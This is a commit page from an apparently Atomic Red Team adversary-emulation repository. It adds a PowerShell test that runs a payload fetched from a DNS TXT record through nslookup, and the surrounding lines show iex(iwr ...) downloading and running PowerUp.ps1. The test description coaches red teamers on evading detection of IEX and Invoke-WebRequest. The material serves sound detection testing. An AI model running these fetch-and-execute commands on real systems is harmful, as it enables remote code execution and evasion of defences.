security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update for name: Abuse Nslookup with DNS Records (#2248)

Browse Source 
* Update for name: Abuse Nslookup with DNS Records

* custom nslookup function

* fix spacing

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
sai prashanth pulisetti
2022-12-17 01:56:42 +05:30
committed by GitHub
parent b86d24fd99
commit 7fd3529b28
1 changed files with 17 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1059.001/T1059.001.yaml
+17
View File
@@ -424,3 +424,20 @@ atomic_tests:
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
name: powershell
- name: Abuse Nslookup with DNS Records
auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
description: |
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
supported_platforms:
- windows
reference : https://twitter.com/jstrosch/status/1237382986557001729
executor:
command: |
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
name: powershell